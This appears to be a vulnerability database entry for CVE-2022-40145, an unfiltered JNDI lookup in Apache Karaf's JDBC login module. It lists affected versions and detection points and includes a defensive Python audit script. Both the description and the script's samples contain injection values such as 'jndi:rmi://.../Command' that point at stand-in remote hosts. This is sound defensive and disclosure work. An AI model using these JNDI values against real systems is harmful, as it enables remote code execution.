CVE-2022-40145
Published 2022-12-21
Severity: critical, CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 2.40% (82.0th percentile)
This vulnerability is a potential code injection that arises when an attacker controls the target LDAP server named in the JDBC JNDI URL.
The function `jaas.modules.src.main.java.org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource` calls `InitialContext.lookup(jndiName)` without filtering the name.
A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`.
This allows remote code execution (RCE) when a configuration uses a JNDI LDAP data source URI and an attacker controls the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage users to upgrade to Apache Karaf 4.4.2 or 4.3.8 at least.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | karaf | < 4.3.8 | 4.3.8 |
| apache | karaf | >= 4.4.0 < 4.4.2 | 4.4.2 |
| apache_software_foundation | apache_karaf | < 4.3.8 | 4.3.8 |
| apache_software_foundation | apache_karaf | >= 4.4.0 < 4.4.2 | 4.4.2 |
Detection & IOCs (extracted from sources)
- Monitor for JNDI RMI or LDAP URIs supplied as JDBC datasource configuration values in Apache Karaf JAAS JDBC login module options (JDBCUtils.DATASOURCE), particularly schemes such as jndi:rmi:// or jndi:ldap:// pointing to external hosts.
- Audit calls to InitialContext.lookup(jndiName) within org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource for unsanitised, externally controlled JNDI names; the absence of input filtering here is the root cause of the RCE.
- Flag outbound RMI (TCP/1099 or high ephemeral RMI ports) and LDAP (TCP/389, TCP/636) connections originating from Apache Karaf JVM processes, which may indicate JNDI injection exploitation in progress.
- Exploitation requires the attacker to already control the target LDAP/RMI server referenced in the JNDI URI; this prerequisite reduces exploitability compared to fully unauthenticated RCE.
- All Apache Karaf versions up to and including 4.4.1 and 4.3.7 are affected; versions 4.4.2 and 4.3.8 contain the fix.
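As a defensive illustration of the root cause and of the first detection point above (an added example, not Karaf code): a small audit script that reads JDBC login module option lines, accepts `osgi:` service references and plain `jndi:` names, and flags any `jndi:` value that carries a URL scheme, which is the form an injected remote lookup takes. The option lines are constructed samples, and the set of schemes treated as remote is an assumption.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample of JDBCLoginModule option lines (key = value); not a real deployment.
SAMPLE_OPTIONS = """\
datasource = osgi:javax.sql.DataSource/(osgi.jndi.service.name=jdbc/karafdb)
query.password = SELECT PASSWORD FROM USERS WHERE USERNAME=?
datasource = jndi:jdbc/karafdb
datasource = jndi:rmi://203.0.113.5:1099/Command
datasource = jndi:ldap://203.0.113.9:389/cn=x
datasource = jndi:ldaps://localhost:636/cn=x
"""

# URL schemes that make InitialContext.lookup() contact a server named by the
# value itself (assumption: flag every one of these as remote, loopback included).
REMOTE_SCHEMES = {"rmi", "ldap", "ldaps", "iiop", "dns"}
OPTION_RE = re.compile(r"^\s*datasource\s*=\s*(?P<value>\S+)\s*$", re.IGNORECASE)
URL_RE = re.compile(r"^(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*)://(?P<host>[^/:]*)")

def classify(value: str) -> Optional[str]:
    """Return why a datasource value is unsafe, or None if it looks benign."""
    if value.startswith("osgi:"):
        return None  # OSGi service reference, resolved inside the container
    if value.startswith("jndi:"):
        url = URL_RE.match(value[len("jndi:"):])
        if url is None:
            return None  # plain name, looked up in the local JNDI context
        scheme = url.group("scheme").lower()
        if scheme in REMOTE_SCHEMES:
            return f"jndi lookup of remote {scheme}:// URL (host {url.group('host')})"
        return f"jndi lookup of URL with unexpected scheme {scheme}://"
    # Assumption: a value with neither prefix is worth a manual look.
    return "datasource value has neither osgi: nor jndi: prefix"

def scan(options_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, value, reason) for every unsafe datasource line."""
    findings = []
    for line_no, line in enumerate(options_text.splitlines(), start=1):
        match = OPTION_RE.match(line)
        if match is None:
            continue
        reason = classify(match.group("value"))
        if reason is not None:
            findings.append((line_no, match.group("value"), reason))
    return findings

if __name__ == "__main__":
    for line_no, value, reason in scan(SAMPLE_OPTIONS):
        print(f"line {line_no}: {reason}: {value}")
```

Run against the constructed sample, only the three URL-bearing `jndi:` lines are reported; the `osgi:` reference and the plain `jndi:jdbc/karafdb` name pass.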
CVSS provenance
- NVD (CVSS v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Red Hat (vendor): 9.8 CRITICAL
Sources
- OSV (2022-12-21): "Apache Karaf vulnerable to potential code injection", CRITICAL
- GHSA (2022-12-21): "Apache Karaf vulnerable to potential code injection", CRITICAL, CWE-20
- Red Hat (2022-12-21): "karaf: JDBC JAAS LDAP injection", CRITICAL, CVSS 9.8, CWE-20
Each source carries the same description text as given above.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.